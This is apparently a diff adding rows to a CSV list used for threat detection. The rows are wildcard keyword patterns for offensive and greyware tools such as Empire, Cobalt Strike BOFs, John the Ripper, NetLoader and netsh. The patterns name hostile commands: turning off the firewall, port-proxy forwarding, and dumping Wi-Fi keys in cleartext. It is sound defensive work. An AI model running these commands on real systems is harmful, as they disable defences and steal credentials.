+"*Net-GPPPassword_dotNET*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z"
+"*Net-GPPPassword-master*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z"
+"*nethunter-*.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. 
Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*nethunter-*.zip*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*nethunter-*-oos-ten-kalifs-full.zip*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netlm_downgrade.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*NETLMv2_fmt_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*NetLoader.exe --path *.exe *","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*NetLoader-master*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*netloggedonusers.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*netlogon_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*netntlm.pl *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*NetNTLMtoSilverTicket.git*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
+"*NetNTLMtoSilverTicket-master*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
+"*netpass.exe*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netpass.zip*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. 
Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netpass_x64.exe*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netpass-x64.zip*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. 
as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netscan.exe /*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*netscan_setup.exe*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*NetSh Advfirewall set allprofiles state off*","greyware_tool_keyword","netsh","Disable Windows Firewall","T1562.004 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netsh interface portproxy add v4tov4 listenport=* connectport=* connectaddress=*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*netsh interface portproxy add v4tov4*listenaddress=* listenport=*connectaddress=*connectport*","greyware_tool_keyword","netsh","The actor has used the following commands to enable port forwarding [T1090] on the host","T1090.003 - T1123","TA0005 - TA0002","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netsh interface portproxy delete v4tov4 listenport=*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*netsh interface portproxy show v4tov4*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*netsh.exe add helper *\temp\*.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*netshrun.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*netsniff-ng*","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. 
It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. so that the kernel does not need to copy packets from kernelspace to userspace.","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netstat -ano*","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netstat -ant*","greyware_tool_keyword","netstat","View all active TCP connections and the TCP and UDP ports the host is listening on.","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*netstat -tnlp || ss -tnlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*netstat -unlp || ss -unlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*NETSTAT.EXE* -ano*","greyware_tool_keyword","netstat","Adversaries 
may attempt to execute recon commands","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*nettitude/ETWHash*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"*nettitude/MalSCCM*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*netuser_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*netview_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*network2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*NetworkMiner*","offensive_tool_keyword","NetworkMiner","A Network Forensic Analysis Tool (NFAT)","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","http://www.netresec.com/?page=NetworkMiner","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*new session to 127.0.0.1:3000*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*NewAdminAccountCreation.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*New-ElevatedPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-ElevatedPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-HoneyHash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-HoneyHash.ps1*","offensive_tool_keyword","empire","Empire scripts 
paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule -ModuleName Win32*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
